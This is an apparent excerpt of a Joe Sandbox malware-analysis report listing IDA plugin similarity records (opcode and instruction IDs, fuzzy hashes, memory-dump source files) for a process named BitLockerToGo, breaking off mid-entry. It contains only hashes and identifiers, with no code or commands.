• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f8be971a025f9ea4dad753c0a0104c709968f2747e4de7bbcc45472c5bbdfb8e
• Instruction ID: b44bb235da679b9d4976e93abef0c9d536c2a5bc5a3fd45c74a1b1645caa880f
• Opcode Fuzzy Hash: f8be971a025f9ea4dad753c0a0104c709968f2747e4de7bbcc45472c5bbdfb8e
• Instruction Fuzzy Hash: 9F81BCB2B0836047D32C8B398861377BBD29FD2300F198A6EDDD69B395DA3D88058346

Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8e0cca39ff84fd151555c3515fd608dd66d946058cc07cd03d6a9ca66c6d7bf4
• Instruction ID: 0b75c641ef86875913c7a4602837477fd66e06e7b881d18e1bf74f4f6d377190
• Opcode Fuzzy Hash: 8e0cca39ff84fd151555c3515fd608dd66d946058cc07cd03d6a9ca66c6d7bf4
• Instruction Fuzzy Hash: 9C719AB2A083A047D32C8F39D821377BBE29FE7301F19896ED9C65B395D6398805C746

Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 061b739078cc944f6446272cb03cb648cddea56f82afbd1ec2b5e27c8e88d9a3
• Instruction ID: 00cda835a3a8aeb8ca76c1c513f600a6db5b22fd1286c69882b03dc57e62e5c7
• Opcode Fuzzy Hash: 061b739078cc944f6446272cb03cb648cddea56f82afbd1ec2b5e27c8e88d9a3
• Instruction Fuzzy Hash: 43816B33B596A047D328893D5C61266AE934FD2334BAEC77ED9F1C73E0D56888064349

Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d4807037297a7e3104e2ae3dbc675ba34f87146a20a88a7aff381104f722076d
• Instruction ID: db08bdad15a63e4df9f314543d4af99eb2d912985351c27f86e3b3c4355c91b9
• Opcode Fuzzy Hash: d4807037297a7e3104e2ae3dbc675ba34f87146a20a88a7aff381104f722076d
• Instruction Fuzzy Hash: 2E711737B69A900BD32C997C4C522A679834BDB330F2D977FA6B1873F1D96C48014359

Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3874e048970d52e5b543a5f06efacf9fa865be40d470309b55445cd8be651e1b
• Instruction ID: 0a1689103dabd55f27f2e03787a13a7b13e81383c3a10f321d9325b0050b6a6c
• Opcode Fuzzy Hash: 3874e048970d52e5b543a5f06efacf9fa865be40d470309b55445cd8be651e1b
• Instruction Fuzzy Hash: DD711933B89A904BE3288A3C4C513AA6E934BD7330F2DC77ED9B5873D5D5694C528349

Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ecc22dd6af61081940a3d2dd8ac2a609c6fbf4c81f4c22bb7c9dd03bae6ff5c2
• Instruction ID: 6f54ec1628887ebd124369c7e01a5fce9683b9cdbba84facb4991cc2a76e656b
• Opcode Fuzzy Hash: ecc22dd6af61081940a3d2dd8ac2a609c6fbf4c81f4c22bb7c9dd03bae6ff5c2
• Instruction Fuzzy Hash: 49811776605B408FC314DF38D4912A6BBF2EFD9304F19C96DD5DA8B361EA38A445CB06

Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1b84af9449327720d47bc5a6d1181cb27be8339f8beb1a7ba5d76c69873097f5
• Instruction ID: 71dcd362bb1b85959b9f0527bcc8ea627fe0c4010d3ec26d4460f76470eb0627
• Opcode Fuzzy Hash: 1b84af9449327720d47bc5a6d1181cb27be8339f8beb1a7ba5d76c69873097f5
• Instruction Fuzzy Hash: 4D81D476A04B408FC314DF39D491296BBE2EF9A304F18C96DD5DA8B761EA38E445CB06

Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 491e0b4e746b6ae2b26135feb799896fdafc5d05ae4958b8f668b56a95cdd03d
• Instruction ID: b7783948d08f39a67ea1c3b961408871100e1d4f435334161cb92700b073aafb
• Opcode Fuzzy Hash: 491e0b4e746b6ae2b26135feb799896fdafc5d05ae4958b8f668b56a95cdd03d
• Instruction Fuzzy Hash: 6671A47164C3918FC715CF28C49062EBBE2AFC9314F18866EE4E58B352D739D846CB96

Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 69b4de0d890f87869950805b59b5e99604ead4b317454bd70b553ddd3ce74cca
• Instruction ID: 05809e16915fed128d931126e19dbd27adc8a27fec7a90456d3853c1e5d654cb
• Opcode Fuzzy Hash: 69b4de0d890f87869950805b59b5e99604ead4b317454bd70b553ddd3ce74cca
• Instruction Fuzzy Hash: DD517A76B002628FDB20CF64D8412EBF7A1EF96310F54862BC59597381E338E945DBD5

Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cac67eff1fc8808891f639f2180ed2aea8cc2f753968fdf17d4751e1f7ef00e7
• Instruction ID: 3b41f08a3a3615997a235241210a21f9c2c00a8ca0b6a160b4a4c4c500019e3c
• Opcode Fuzzy Hash: cac67eff1fc8808891f639f2180ed2aea8cc2f753968fdf17d4751e1f7ef00e7
• Instruction Fuzzy Hash: 6D5177345127018BC7248F24C8A2773B7B2FF96320B19815DD4860F7A1F739E8A1CB8A

Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 88c03fc451623f9268d23274198f04e43c364dd01cb0c4d34e9fd8ada386ab99
• Instruction ID: a7d43d3a713622c042a2e41d4a48fea9871682f3be10858a8f07de32be899553
• Opcode Fuzzy Hash: 88c03fc451623f9268d23274198f04e43c364dd01cb0c4d34e9fd8ada386ab99
• Instruction Fuzzy Hash: E25115B01117028BC724CF24C4A17B3B3B1FF56361B29965DD4860B7A1E338E8A1CB9A

Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bdd1d7248006fac35233d4c2f05cd9073d205649cf1ee8f499dc35e0785e639b
• Instruction ID: b0a8cd444d38c64fca3fda87be0bcf235bbc19e32bd7f61d0494594084362add
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bdd1d7248006fac35233d4c2f05cd9073d205649cf1ee8f499dc35e0785e639b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A6517EB15083549FE314DF29D89435BBBE1BBC8318F054A2EE4E583390E379D6088F86
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: d82c1330955702a364d963265f3286a315896802f7bfb0e17870ce11e6f90af1
                                                                                                                                                                                                              • Instruction ID: 959a512eeab541835f96cd7f6e01a658626a50f912d0bdf03c47c42ea7ec9c4e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d82c1330955702a364d963265f3286a315896802f7bfb0e17870ce11e6f90af1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E1513633F59A904BD728893C4C502E66E930BE7334B3DC76AE5B1C73E4D5698C528349
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: cf7af7ae163016bf3a5d854131f20c3c600ee3933dded72a1a5d137a4ac266c8
                                                                                                                                                                                                              • Instruction ID: d25d694360d149a90b06bdb1e0254df6f0428fd2c3658b290a7790044fdb4d74
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cf7af7ae163016bf3a5d854131f20c3c600ee3933dded72a1a5d137a4ac266c8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EE5136376599C047D3288A3C4C612AA6A930FD3230B3DC7AFD5B6873E5D9694C464359
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: dd67305bd78394fc8873c5d0809a5da29ccea30ea79d8d7a0a3ed3731dd7d51c
                                                                                                                                                                                                              • Instruction ID: 9a1f03d4dd20f9fad3c2190f3cfc6065b17ba6dda419f6486c59b63e61019088
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dd67305bd78394fc8873c5d0809a5da29ccea30ea79d8d7a0a3ed3731dd7d51c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A35147756183A09BE3358F24DC90BABBBE2AFD3301F14896DE8C96B381D6394805C757
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: d65df40cd549245263d1dad52dba55f689dea4e02e383ea649d3bbebee6b2713
                                                                                                                                                                                                              • Instruction ID: f086d3d41bd71bdc03d38f4d3bd9482c1b42cc541d618f56ef71cddd0e0e0261
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d65df40cd549245263d1dad52dba55f689dea4e02e383ea649d3bbebee6b2713
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9A514432605B818BD325CF29C8906B3FBE29FA6300B28886EC0D687751E738E55A8755
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: d4d0c9d6ab8b9dc3315b8601ac2963c6970f8dbeb2a979f22ab98ace889d458a
                                                                                                                                                                                                              • Instruction ID: 546ab2e6fdffafe73fe0a8b860a77a3a5cd9bd8a30b912bf61ebe424895ce4ca
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d4d0c9d6ab8b9dc3315b8601ac2963c6970f8dbeb2a979f22ab98ace889d458a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6E41DB327081564BC7288E3D9E9417AFBE29FC5308B1D877EE889E73C2D578D9019798
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: e45f20214bf21905183cb1140874c278e2cd046cde042ad1ea360a6847ddd4ff
                                                                                                                                                                                                              • Instruction ID: 61196fbe4793393b89ebfd6a1a06c486cb46a45a7e230e91c15214dde0b2d2aa
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e45f20214bf21905183cb1140874c278e2cd046cde042ad1ea360a6847ddd4ff
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D6154B0601300CFE7209F12C991B127BB2FFA6314F169998D6454F7A6D3BAD859CF84
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 12e1380db867051d63d01232387ceadab44b98608807bbbf439c5b7756c3b80e
                                                                                                                                                                                                              • Instruction ID: 88033d5e7ac54c645a990e866b06058151a6dc4e1f8aadf696473e0c042e3f02
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 12e1380db867051d63d01232387ceadab44b98608807bbbf439c5b7756c3b80e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D41E27150C3A187CB3A8B3994607FBB6E0AF9B700F54596DD4CA9B290E7388445878A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 109e9bb4079605bc038373af85dc7c3e2aaf762560e35345aa76a51534d7030e
                                                                                                                                                                                                              • Instruction ID: 04afeecb48b1b214a768d3948dde911867042464f14e443e4d2bba12f8852c97
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 109e9bb4079605bc038373af85dc7c3e2aaf762560e35345aa76a51534d7030e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF5146B5608301CFE3209F64E84672BB7E1FBC5308F06447CE589972A2EB759915DB8A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 523eadca2f8f90cb8c999ed215c6d81f5567a30a813d9c5a9f728960006adf37
• Instruction ID: afc2794f92c05994b3311c420dd19fe8b7e392224432c73a25457092a267678c
• Opcode Fuzzy Hash: 523eadca2f8f90cb8c999ed215c6d81f5567a30a813d9c5a9f728960006adf37
• Instruction Fuzzy Hash: C6318C782081009BD7288F2ACC81E363766EB5A314B54497DFE52E73E2D7349C62DA9C

Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6fe1dffe9c7bb9e5a547c9ad92804e987a1c61166941838442cc42d42e2cb3cd
• Instruction ID: 46e7a14e06699c740de4b2d8f0aa06f55bf302cd9dd4a660e20626605f8218f3
• Opcode Fuzzy Hash: 6fe1dffe9c7bb9e5a547c9ad92804e987a1c61166941838442cc42d42e2cb3cd
• Instruction Fuzzy Hash: 29313973E20A340BD7088D2DAC1126A75825BD5265F9E8379DDBA9F3C2DA34DC1692D0

Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fb81817b57c8e212fc39ba569fbfa121d339b614c1316ee25c8e6978c0bb8225
• Instruction ID: d2e122fcdcbdefefd050c465a623d643b79a35a2d75517d1cef25498a6fcd50c
• Opcode Fuzzy Hash: fb81817b57c8e212fc39ba569fbfa121d339b614c1316ee25c8e6978c0bb8225
• Instruction Fuzzy Hash: 27410232A046308BD328CF29DC4176BB392BB95314F8A863CDDA59B395D7799846C7C1

Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e49c804ef2a5b017a2d39959f3e47572316032b05eecb338b3061f6419b9c818
• Instruction ID: 57d3ad20d75704d68cc86176bcf351aebe7f6d28dc7e58fc948e8610e15cbfd7
• Opcode Fuzzy Hash: e49c804ef2a5b017a2d39959f3e47572316032b05eecb338b3061f6419b9c818
• Instruction Fuzzy Hash: BB3124B6E243005BE304CF79EC4222B76A3EBC5704F08D43EEC54A7255EB7A890A474A

Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 528efb0fd5bccd23b0dba660e7171ccaa7e16db31effe06352f8b6ebcb26164f
• Instruction ID: aff035c6339e2d7a90ae2a3a5b4b83dc219d0afaa5f2daa2453facd1ed0ab710
• Opcode Fuzzy Hash: 528efb0fd5bccd23b0dba660e7171ccaa7e16db31effe06352f8b6ebcb26164f
• Instruction Fuzzy Hash: 5131C032610B418BC728CF38CC92663BBF1AF86328B18992DD0D7D7691D338E54AC759

Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: af399e730694a05470527855dc5e6ad9df6ab6c6e29d0f235fcfe056face4e4e
• Instruction ID: ab51aa93e413debfba8e48ffa7466b019a51a2142e7b76fc8b74a77f7aeb7ece
• Opcode Fuzzy Hash: af399e730694a05470527855dc5e6ad9df6ab6c6e29d0f235fcfe056face4e4e
• Instruction Fuzzy Hash: 7A212426B0C71847E70CED79EC242BBB6C28BD4314F08C53DA69A93385EC748A095285

Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f275240203ce5fe6ee62c376900e49e84225a1c9b7a845b6b17bd2011425d171
• Instruction ID: 95ac7a477c975e15de8c04a5f3dc82c6c2baede9089e7f43ad5e4e5ed4275078
• Opcode Fuzzy Hash: f275240203ce5fe6ee62c376900e49e84225a1c9b7a845b6b17bd2011425d171
• Instruction Fuzzy Hash: 07210573F51A254BE70CCE74DA147ABA2A397D0310F0AC93D9D07AB285DABD58014396

Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 303a53f8f6f0c13bc9f298785c5808cb8a276daa0cafb7ca22b80b88847c91e1
• Instruction ID: 83ed0d2bc1bb73ae19c5ab5e513ff7e79650feb8db7c61828ca245b12b26e3b1
• Opcode Fuzzy Hash: 303a53f8f6f0c13bc9f298785c5808cb8a276daa0cafb7ca22b80b88847c91e1
• Instruction Fuzzy Hash: 3D110437B2822207F354DE36DCDC61B6352EBC631075A0436EE81E7382C6B6F905D164

Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bc2b2449f1927ddecac5d17b1d450968763e4900f8d3fb0560b12521c0ea3983
• Instruction ID: 8df3cd388e3f1a9df31b47192c90ed272165250c44be961b4d970597a5366f64
• Opcode Fuzzy Hash: bc2b2449f1927ddecac5d17b1d450968763e4900f8d3fb0560b12521c0ea3983
• Instruction Fuzzy Hash: 23117AB3B115108BD718CE29DC8426272D3EBC8328F6D82BED159DB291CD7ADD038784

Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
• Instruction ID: f344c88af0e97e3f64ab8a739a4378391849989b40d3f39e6c2aff3554da1db3
• Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
• Instruction Fuzzy Hash: B5112933A055E00EC7128D3C88045A6BFE30AF7635F19539AF4F49B2D2D62ADDCA8359

Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 38e173931c0e1061e62ec36998d8928d0e1713c0226a73d407f5cb03a3096f2a
• Instruction ID: e7fc23a18c5c51c52ccf001cff0cb347413ab4b8ba78d824cfe79ad57718ca25
• Opcode Fuzzy Hash: 38e173931c0e1061e62ec36998d8928d0e1713c0226a73d407f5cb03a3096f2a
• Instruction Fuzzy Hash: 7A019EF170271157D760AE16B5C0B2BA2A86FA0708F58443EE94467382DF7DEC09C6A9

Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 38406c194eb92d85c4cc9da2f922ab00cbd32008c3846a2575a3c93c65f452a0
• Instruction ID: 6560352c488c0cc1cbe0e722603f03bea2e29cffb3ea35ac0bed7bd55b1d1a39
• Opcode Fuzzy Hash: 38406c194eb92d85c4cc9da2f922ab00cbd32008c3846a2575a3c93c65f452a0
• Instruction Fuzzy Hash: EB118F76B112159FEB00CF6DC9016AA7BE2BB89304F15846AE808E7351DA7A99128B54

Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 41775c8a8687da6e2ae8076a84b54c37efd07f3c8797bfb19a9592e8aebfc7e6
                                                                                                                                                                                                              • Instruction ID: c3416db144e0931cee348b225b18a5b3d4626f4555dabc8f772ac4b01c32146e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41775c8a8687da6e2ae8076a84b54c37efd07f3c8797bfb19a9592e8aebfc7e6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E8F0443581D7508AC72D8F54A45402BB7B1FF82B58F52242CDA8A2B331D33399618B8F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 7a984843b570b7378253929d1441754c9cdf9516a4ccd76f455c2bd59a9e2d53
                                                                                                                                                                                                              • Instruction ID: f2ac22fbfefff821cacec86192274fb98584f81c80051fb2e57a6e434b12bc75
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a984843b570b7378253929d1441754c9cdf9516a4ccd76f455c2bd59a9e2d53
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AF01D677A413128B8324CE5CC4D06EBB3B0FF85B95B1A445ED5812F370D7319E558264
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: 031cf76daef0f97509f5645b65aa1fa840631f367d85a6b49b87e32831d22bc2
                                                                                                                                                                                                              • Instruction ID: e67291da7be32d05bc39912814b476a9cfeb596b2505d77ff279258a03f60d40
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 031cf76daef0f97509f5645b65aa1fa840631f367d85a6b49b87e32831d22bc2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0DF086795442086FD1205F459C80D37B77EEB8E778F10121AF994123A1E726ED2297EA
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 815f779b7f74c91ae07349251a652b715847ab3060cea46ff1cca03f017bc8e9
